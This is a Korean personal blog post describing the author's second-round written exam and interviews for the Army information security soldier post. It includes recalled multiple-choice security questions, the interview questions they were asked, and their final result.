서대전역 도착 KTX를 예약했고 한시라도 더 빨리 도착하기 위해 택시를 타고 병무청으로 갔다. 병무청에 도착해서 시간을 보니 오전 11시였고 번호표를 뽑아 번호를 확인해보니 17번 이였다….. 아는 선배는 10시 45분에 병무청에 도착했고 번호표 4번을 뽑았었다. 거의 분당 1명… (참고로 필자가 본 회차는 2차 응시자가 80명 이였다.) 따라서 최대한 빨리가면 갈수록 앞 번호표를 차지할 수 있고 빨리 끝나니 참고하길 바란다. 번호표를 뽑고 오후 1시까지는 약 2시간이 남아있었다. 그래서 2시간 동안 미리 정리해 놓은 필기 자료와 면접 자료를 공부하면서 시간을 보냈다. 2. 필기 시험 2-1. 필기 시험 방식 오후 1시가 되자 병무청에서 일하시는 분이 오셔서 시험에 대한 설명을 해주셨다. 시험 방식은 OMR이나 CBT방식이 아닌 그냥 초등학교 때 보는 시험처럼 답지에 체크하는 방식으로 진행된다. 또한 시험을 볼 때 필기구는 검은색 펜을 기준으로 채점하는 듯 했다. 컴퓨터용 사인펜이나 연필도 가능하는지는 모르겠는데 가급적 검은색 볼펜을 사용하는 것을 추천한다. 펜을 못 가져오시는 분들을 위해 시험 보기 전 병무청에서 검은색 모나미 볼펜을 대여해주기는 한다. (필자도 컴퓨터용 사인펜으로 할까 했는데 혹시 몰라서 병무청에서 제공해주는 볼펜으로 시험을 봤다.) 또한 시험 시간은 20분에 10문제로 4지선다 형식이다. 2차 심사 배점을 살펴보면 필기가 20점 만점이고 문제에 배점 점수가 작성되어 있지 않은걸로 보아 1문제당 2점으로 배점되는듯 하다. 종료방식은 먼저 푼다고 먼저 나갈 수 있는 방식이 아니라 20분 다 지나야 끝나는 방식이다. 시험을 보기 전에 수험표 검사와 신분증 검사를 진행하니 수험표는 잊지 말고 지참해서 가야한다. 또한 수험표 검사를 할 때 수험번호를 알려주신다. 수험번호는 수험표에 작성되어 있는데 해당 번호는 필기 시험 때 수험번호 작성란에 작성하셔야 하고 면접 볼 때도 이름이 아닌 수험번호를 말해야 하기에 까먹지 말고 숙지하자. 2-2. 필기 시험 준비 정보보호병 2차 필기 시험은 따로 정해진 시험 범위가 존재하지 않고 족보가 있다 해도 계속 변형되기에 공부하기가 상당히 까다로웠다. 족보라고 해도 앞서 시험을 보신 분들이 올려주신 문제가 족보인데…. 그닥 도움이 안되었다. 필자도 거의 모든 후기 블로그를 찾아보며 족보를 만들었고 공부했었지만 족보에서 나온문제는 1문제 밖에 없었다. 심지어 1문제도 동일하게 나온 것이 아니라 변형해서 나왔기에 그냥 필자 지식으로 풀었다. 그나마 필자는 이전글에서 언급했듯이 자격증 2개를 취득했었기에 사전 지식이 상당히 있었고 해당 지식이 많은 도움을 준 것 같다. (자격증 공부를 꼼꼼히 해서 해당 지식이 아직도 있었음) 또한 앞서 말했듯이 필자는 오전 11시에 도착했었고 2시간 동안 필기, 면접을 공부했었다. 혹시 모를 상황에 노트북을 챙겨갔었고 그 2시간 동안 정보처리(산업)기사 CBT 시험을 공부하면서 보냈다. 거기서 한 문제 정도 출제되었었다. 필자 생각에는 필기시험 공부법은 자격증 필기 공부가 답인듯 하다. 자신이 정보보호병을 준비하고 있고 시간이 상당히 남는다면 강의나 책을 보면서 자격증 하나를 준비하면 그게 정보보호병 필기 시험을 공부하는 것이라고 생각한다. 만약 시간이 없다고 하면 강의나 책 공부는 힘들고 CBT 시험을 보면서 답과 해설 위주로 공부하는게 좋다고 생각된다. 자격증은 정보처리(산업)기사, 네트워크 관리사, 인터넷보안전문가를 추천한다. 혹시나 필자가 본 이번회차 기출문제가 도움이 될 수도 있으니 “2-4. 필기 문제 복기”에 문제를 복기 해놓겠다. 2-3. 필기 후기 이번 회차는 2차 응시생이 80명이다보니 시험장에 모든 인원이 들어갈 수가 없었다. 그래서 번호표 순서를 기준으로 1~40번까지 먼저 필기를 보고 나머지 41~80번은 3층에서 대기를 했다가 끝나면 내려와 시험을 보는 방식으로 진행되었었다. (2층이 필기 시험 장소이고 3층이 면접 장소이다. 참고로 번호표는 2층에서 뽑을 수 있다.) 시험 난이도는 중 혹은 중상정도라고 생각된다. 10문제 중 2문제 정도는 잘 몰라서 찍었고 그 외에 1~2문제 정도 애매한 문제들이 있었다. 같이 서류 합격한 동기와 선배도 찍은 문제가 상당히 있던걸로 기억되고 “4. 결과”에서 설명할 최종 컷트라인도 보면 이번 필기가 꽤 어렵다는 생각을 했다. 필자의 결과는 “4. 결과”에서 한번에 설명하도록 하겠다. 2-4. 필기 문제 복기 사실 족보가 중요하지 않다고 말하기는 했는데 그래도 어떤 문제가 나왔고 어떤 느낌인지 아시면 좋으실 것 같아서 2차 심사를 끝낸 당일날 문제를 복기하기는 했다. 하지만 모든 문제를 복기하지는 못했고 10문제 중 9문제 정도만 복기를 했고 문제 순서는 달라도 내용은 비슷하다고 생각하시면 된다. 1번 전자서명과 관련없는 프로토콜을 고르시오. 1. DSA 2. KCDSA 3. ECDSA 4. A5/3 => 답 : 4 2번 DB 보안으로서 적절하지 못한 자세는? (문제설명이 똑같지는 않지만 취지는 동일하다.) 1. 관리자를 최소한으로 만든다. 2. 로컬 계정으로 접속하는 것을 금지 3. Guest 계정으로 접속하는 것을 금지 4. 기억 안나는데 답은 아니였음 => 답 : 2 3번 SIEM에서 사용되는 프로토콜로 적절하지 못한 것은? 1. Qrader 2. Arcsight 3. SPLUNK 4. 기억 안나는데 이게 답인듯 => 답 : 4 (정답은 기억 안나는데 나머지 보기는 틀린 보기임) 4번 공개키와 대칭키 알고리즘을 사용하여 키교환을 하는 방식에서 제 3자가 해당 공개키를 인증할 수 있는 시스템은? (문제설명이 똑같지는 않지만 취지는 동일하다.) 1. 키 분배 인증 센터 2. RSA 3. Diffie Hellman 4. 기억 안남 => 답 : 1 5번 문제 기억 안남 6번 파일 시스템 내에서 파일이나 디렉토리의 고유한 번호, 블록 정보 등이 담겨있는 파일은? 1. boot 2. data 3. i-node 4. 기억 안남 => 답 : 3 7번 멀티 쓰레드나 멀티 프로세스에서 공유 자원을 여러 실행흐름이 접근하여 발생될 수 있는 취약점은? 1. buffer overflow 2. Return to Library 3. Race Condition 4. SQL Injection => 답 : 3 8번 웹 로그 파일에 기록되는 보기로 알맞지 않은 것을 고르시오. 1. IP 주소 2. 접속 시 Method 3. 접속 시 프로토콜 4. 접속 시 포트번호 => 답 : 3 (정답이 정확하지는 않음 필자는 3번으로 적음) 9번 IDS가 수행되는 절차를 알맞게 배열한 보기를 고르시오. => 답 : [데이터 수집 -> 가공 -> 분석 -> 보고] 10번 TCP에서 4way HandShake의 연결 종료 과정에서 Seq와 ACK의 번호로 ㄱ, ㄴ, ㄷ, ㄹ에 알맞는 번호가 들어간 것을 고르시오. => 이 문제는 연결 종료 과정을 보여주면서 빈칸 기호와 번호가 일치하는 보기를 고르는 문제임. 답은 기억 안남 필자는 총 9문제(5번 제외) 중 3, 10번 문제를 찍었고 2, 7번 문제 답이 긴가민가 했었다. 아마 5번도 아는 문제였던걸로 기억된다. 3. 면접 시험 3-1. 면접 방식 필기 시험이 마무리 되면 뒤쪽에 시험지를 제출하고 3층으로 올라간다. 3층에 올라가면 의자가 쭉 있고 가장 안쪽에 3개의 면접실이 존재한다. 그리고 안쪽부터 앞 번호 순서대로 앉게 된다. 면접실은 3개 중 양쪽 끝 면접실만 사용하며 면접실을 바라볼 때 왼쪽이 기술 면접실, 오른쪽이 인성 면접실로 기억된다. 기술면접, 인성면접이라고 작성되어 있는건 아니고 필자가 받은 질문을 보고 판단한 것이다. 또한 회차마다 왼쪽 오른쪽이 바뀔 수 있다. 면접은 1대1로 진행되고 면접 시간은 사람 by 사람인듯 하다. 어떤 사람은 꽤 오래하고 어떤 사람은 금방 끝나는 걸로 보아 사람마다 다른 것 같다. 필자는 면접실 당 3분? 정도로 나름 빠르게 끝난 편이다. 3-2. 면접 준비 면접 준비는 필기보다 상당히 수월하다. 일단 사전에 면접을 보신 분들이 올려주신 기출질문을 보고 자신이 직접 생각해보고 말하는 연습을 하면 된다. 필자도 여러 후기 블로그를 찾아보면서 해당 블로거 분이 받으셨던 질문에 대해 생각해보고 답변을 작성하여 연습해보면서 준비를 하였다. 그렇게 준비하니 거의 98% 예상질문에서 질문이 나왔다. 준비 기간은 약 4일 정도로 잡았고 예상질문에 대한 나의 생각을 정리하며 연습하는데 대부분의 시간을 썼다. 3-2-1. 기술 면접 준비 기술 면접에서는 지원 동기와, 정보보호병의 역할, 다양한 공격 기술, 내가 했던 프로젝트 정도를 잘 정리해서 준비하면 될 듯하다. 물론 내가 모르는 기술을 질문하실 수도 있으니 다양한 기술을 보면서 정리하는 것도 좋다. 또한 프로젝트의 경우 꼬리 질문이 나올 수 있기에 꼬리 질문에 대한 준비도 해놓는것이 좋다. 프로젝트에서 어떤 기술을 써봤는지, 어떤 툴을 써봤는지 등등… 당연히 해당 기술에 대해서도 잘 설명할 수 있어야 한다. 3-2-2. 인성 면접 준비 인성 면접은 기술 면접처럼 난이도 있는 질문보다는 난처한 상황에서의 대처 질문에 대해 준비하면 좋을 듯하다. 대부분 “~한 상황에서 어떻게 대처하실 건가요?” 혹은 “~상황은 괜찮나요?” 같은 질문이 있으니 이에 대해 준비하면 좋다. 인성 면접에서도 지원 동기와 정보보호병의 역할을 질문할 수도 있으니 생각은 해놓고 있으면 도움이 될 것 같다. 3-3. 면접 후기 필자 역시 위에서 설명한 준비 방법대로 나름 구체적으로 준비를 했다. 특히 기술 면접에서 기술적 질문을 많이 물어보실 줄 알고 철저히 준비를 했는데 필자에게는 물어보지 않으신것 같다. (필자 기준이기에 다른 분들에게는 나올 수 있음) 오히려 BoB 출신이라서 그런지 BoB에 대한 내용을 약간 물어보셨다. 이번에 같이 본 BoB 동기에게도 어떤 질문이 나왔냐고 물어봤는데 필자와 99% 동일한 질문이 나왔다. 당연히 면접 질문에 대해서는 “3-4. 면접 질문 복기”에 적어놓았다. 인성 면접에서는 예상하지 못했던 질문이 있긴 있었는데 그렇게 어렵지 않은 질문이라 편하게 답변한 것 같다. 그 외의 질문은 면접 준비 때 준비했던 예상 질문에서 모두 나와 준비한대로 잘 답변한 것 같다. 만약 예상질문으로 준비를 못했다면 필자 역시 많이 얼버무리고 어리바리 했을지도 모르겠다는 생각을 했다. 아 그리고 필자는 17번째로 면접을 진행했었는데 면접이 끝나니 오후 3시였다. 면접은 필기 시험이 끝나고 약 오후 1시 30분 쯤에 시작했다. 사실 면접이 언제 끝날지 몰라 돌아가는 KTX를 예약 못했는데 3시에 끝나고 좌석을 보니 4시10분 기차가 있어서 잘 타고 올라갔다. 면접 끝나고 2층을 통해 내려가는데 40번대 이후 사람들이 기다리는 걸보고 일찍오길 잘했다는 생각이 들었다. 3-4. 면접 질문 복기 3-4-1. 인성 면접 1. 군 복무 생활을 하면서 상급자가 부당한 명령을 주었다면 어떻게 할 것인가요? 2. 지금까지 약 20년 정도 살았는데 살면서 가장 낙심했던 적이랑 기뻤던 적은 언제인가요? 3. 해킹 방어 대회 Defcon이나 CodeGate 같은 곳 말고 해킹을 해본적이 있나요? 4. BoB를 하면서 어떤 프로젝트를 했나요? 3-4-2. 기술 면접 1. 정보보호병이 어떤 역할을 하는지 아나요? 2. 정보보호병에 왜 지원하게 되었나요? 3. 정보보호병 가면 어떤 일을 하고 싶나요? 3-1. 실시간 모니터링과 같은 역할도 괜찮은가요? 4. 분석 툴 같은 것은 사용해본적이 있나요? 5. 학교 동아리나 외부 동아리 같은 곳에서 공부한 적이 있나요? 6. BoB에서 어떤 프로젝트 했나요?(인성 면접이랑 동일 질문) 위와 같이 인성, 기술 합쳐서 약 11개 정도의 질문을 받았다. 인성 질문에서 첫 번째 질문이 나름 날카로운 질문이였는데 예상질문에 있는 질문이라 나름 답변을 잘한 것 같다. 그 외는 무난무난. 4. 결과 이렇게 필기와 면접을 잘 마무리하고 조마조마하며 결과를 기다렸다. 사실 2차 심사가 끝나고 올라오면서 약간 느낌이 좋았다. 하지만 1차 결과가 46등이고 선발인원은 40명이여서 6명 이상을 치고 올라가야 했기에 불안했던 것은 사실이다. 이게 상대평가이기 때문에 아무리 내가 잘봐도 내 앞 사람이 나보다 잘보면 떨어지기 때문이다. 그렇게 기다림 끝에 5월 27일 결과가 나왔고 6명만 치고 올라오면 되는데 40명을 치고 올라와버렸다. 결과는 [그림 3]과 같았다. [그림 3] 면접/실기 점수를 보니……ㄷㄷ 40점 만점 중에 39점!!!! 1점만 감점된걸로 보아 필기 10문제는 다 맞은 것 같고 면접에서 1점 감점 당한것 같다. 나도 이렇게 잘 받을 줄은 상상도 못했다. 합격 컷트라인을 보면 57.5점이 컷트라인인데 1차 때 46등으로 합격한 내가 34.0점이였다. 즉 내가 2차를 23.5점(34점과 57.5점 차)만 맞아도 합격할 만큼 이번 2차가 꽤 어려웠던 것 같다. (23.5점이면 필기 반 타작해도 충분히 맞을 수 있는 점수이다.) 2차 중에서도 면접은 늘 비슷하니 필기가 상당히 어려웠다는 생각이 든다. 앞 글에서도 언급했던 이번에 같이 본 동기와 선배는 서류점수가 높아 80점과 76점으로 1등, 2등으로 합격했다. (나도 출석만 아니였으면…..ㅎㅎ) 76점이 2등이고 73점이 6등인걸로 보아 그 사이의 등수는 거기서 거기인듯 하다. 아무튼 다행이도 6등으로 최종합격을 하게되어 정보보호병으로 군입대를 할 예정이다. 이번 회차는 입영일이 2가지 선택이 있었는데 필자는 더 빨리 입대하는 7월 12일 입대로 입대할 것 같다. [그림 4] 이로써 “육군 정보보호병 2차 최종 합격”에 대한 글을 마치려고 한다. 인쇄
So you have finished reading the 정보 보호 병 topic article, if you find this article useful, please share it. Thank you very much. See more: 정보보호병 후기, 정보보호병 하는일, 정보보호병 자대배치, 정보보호병 디시, 공군 정보보호병 생활, 정보보호병 2022, 해군 정보보호병 후기, 정보보호병 해군